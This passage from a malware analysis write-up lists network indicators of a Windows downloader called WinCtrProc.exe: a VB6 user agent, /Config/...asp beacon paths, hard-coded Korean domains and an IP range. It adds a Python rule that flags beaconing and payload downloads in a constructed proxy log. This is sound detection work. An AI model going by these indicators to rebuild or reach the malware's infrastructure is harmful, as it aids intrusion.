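For detection, the capture and the strings dump together give three usable features: the user agent "Microsoft URL Control - 6.01.9782", the /Config/<dir>/<name>.asp request shape with uno=, user_no=, n= or version= parameters, and the server domains hard-coded in WinCtrProc.exe (maketop.kr, korserver.com, koreaserver.kr, domainserver.co.kr, hostserver.kr, mainserver.kr, makevalue.com, duzip.com, itemprice.kr, micronames.co.kr, azgogo.net). The user agent alone is not a safe indicator: it is the stock string sent by the VB6 Internet Transfer Control (MSINET.OCX, listed in the dump), so any VB6 program using that control produces it. The Python below is an added example, not part of the Lavasoft report; it flags a line only when the user agent is combined with the path shape or a known host. The proxy log format and the sample lines are constructed for this example.

```python
"""Added example (not part of the Lavasoft report): flag the beaconing pattern
from the capture above in a web-proxy log.  The VB6 Internet Transfer Control
user agent is noisy on its own, so it is only scored together with the
/Config/<dir>/<name>.asp request shape or a host known from the sample.
Log format and sample lines are constructed here."""
import re
from urllib.parse import urlsplit, parse_qs

VB6_INET_UA = "Microsoft URL Control - 6.01.9782"
# Domains from the strings dump plus the IIS hosts contacted in the capture.
KNOWN_HOSTS = {
    "micronames.co.kr", "maketop.kr", "korserver.com", "koreaserver.kr",
    "domainserver.co.kr", "hostserver.kr", "mainserver.kr", "makevalue.com",
    "duzip.com", "itemprice.kr", "azgogo.net",
}
KNOWN_PREFIX = "220.73.162."          # the /24 the config replies enumerate
CONFIG_PATH = re.compile(r"^/config/(?:[a-z]+/)?[a-z_]+\.asp$", re.I)
CONFIG_KEYS = {"uno", "user_no", "n", "version", "nation"}
PAYLOAD_PATH = re.compile(r"^/download/[a-z]+\.exe$", re.I)

# Constructed proxy log, one request per line: <client> <method> <url> "<user-agent>"
SAMPLE_LOG = """\
10.0.0.5 GET http://hostserver.kr/Config/AdNw/StakePsList.asp?uno=3207 "Microsoft URL Control - 6.01.9782"
10.0.0.5 GET http://220.73.162.2/Download/WinCtrProc.exe "Microsoft URL Control - 6.01.9782"
10.0.0.5 GET http://220.73.162.24/Config/NewConf/ProgramUpdateLab.asp?version=1425 "Microsoft URL Control - 6.01.9782"
10.0.0.7 GET http://intranet.example/Config/Site/Report.asp?uno=1 "Mozilla/5.0"
10.0.0.8 GET http://updates.example/check.asp?version=2 "Microsoft URL Control - 6.01.9782"
10.0.0.9 GET http://www.naver.com/ "Mozilla/5.0"
"""
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def classify(line):
    """Return a verdict for one log line, or None if nothing matched."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _client, _method, url, ua = m.groups()
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    known = host in KNOWN_HOSTS or host.startswith(KNOWN_PREFIX)
    keys = set(parse_qs(parts.query, keep_blank_values=True))
    # UA + config-endpoint shape, tightened by either a known host or the
    # parameter names the sample uses (uno, user_no, n, version, nation).
    if ua == VB6_INET_UA and CONFIG_PATH.match(parts.path) and (known or keys & CONFIG_KEYS):
        return "config-beacon"
    # UA + /Download/<name>.exe from a host the config replies listed.
    if ua == VB6_INET_UA and PAYLOAD_PATH.match(parts.path) and known:
        return "payload-download"
    if known:
        return "known-infrastructure"   # any other contact with the listed hosts
    return None


def scan(log_text):
    """(client, verdict, url) for every flagged line, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        verdict = classify(line)
        if m and verdict:
            hits.append((m.group(1), verdict, m.group(3)))
    return hits


if __name__ == "__main__":
    for client, verdict, url in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{url}")
```

The two negative sample lines are deliberate: a browser hitting an internal /Config/...asp?uno= page and a VB6 updater with the same user agent on an unrelated host must both stay silent, otherwise the rule is just a user-agent match with extra steps.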